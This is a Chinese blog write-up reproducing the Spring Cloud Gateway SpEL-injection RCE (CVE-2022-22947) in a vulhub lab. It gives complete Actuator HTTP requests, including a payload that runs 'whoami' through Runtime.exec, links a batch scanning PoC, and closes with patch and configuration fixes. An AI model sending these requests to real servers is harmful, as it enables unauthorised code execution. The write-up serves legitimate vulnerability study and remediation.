Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
一、漏洞描述
Spring Cloud Gateway是Spring Cloud官方推出的第二代网关框架,取代Zuul网关。网关作为流量的,在微服务系统中有着非常作用,网关常见的功能有路由转发、权限校验、限流控制等作用。
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,其在启用、公开、不安全、攻击者可以访问Actuator API的情况下,容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求
二、影响版本
Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway < 3.0.7
三、环境搭建
搭建的环境是在centos中搭建了vulhub靶机
启动靶机:
cd vulhub-master/spring/CVE-2022-22947
docker-compose up -d
访问:http://192.168.199.52:8080/
四、漏洞复现
1、添加一个spel表达式的路由
访问:http://192.168.199.52:8080/actuator/gateway/routes/xd
使用burp抓包
数据包如下:
POST /actuator/gateway/routes/xd HTTP/1.1
Host: 192.168.199.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 366
{
"id": "xd",
"filters": [{
"name": "AddResponseHeader",
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
}],
"uri": "http://example.com",
"order": 0
}
2、促发路由生效
访问:http://192.168.199.52:8080/actuator/gateway/refresh
数据包如下:
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.199.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
3、查看执行结果
访问:http://192.168.199.52:8080/actuator/gateway/routes/xd
数据包:
GET /actuator/gateway/routes/xd HTTP/1.1
Host: 192.168.199.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
4、清理路由、
访问:192.168.199.52:8080/actuator/gateway/routes/xd
数据包如下:
DELETE /actuator/gateway/routes/xd HTTP/1.1
Host: 192.168.199.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
5、重复步骤2,让清除路由生效
批量检测漏洞工具:
https://github.com/Xd-tl/CVE-2022-22947-Rce_POC
五、修复建议
1、3.1.x 版本用户应升级到 3.1.1+ 版本,3.0.x 版本用户应升级到 3.0.7+ 版本。
2、在不影响业务的前提下,通过将配置选项 management.endpoint.gateway.enabled 设置为 false 禁用 gateway actuator endpoint。
参考链接:Spring Cloud Gateway_CVE-2022-22947漏洞复现_安全混子的博客-CSDN博客
声明:
本文仅限于大家技术交流和学习,严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,
作者创作不容易,请大家点赞收藏支持一下。谢谢各位读者大老爷。
好文链接
发表评论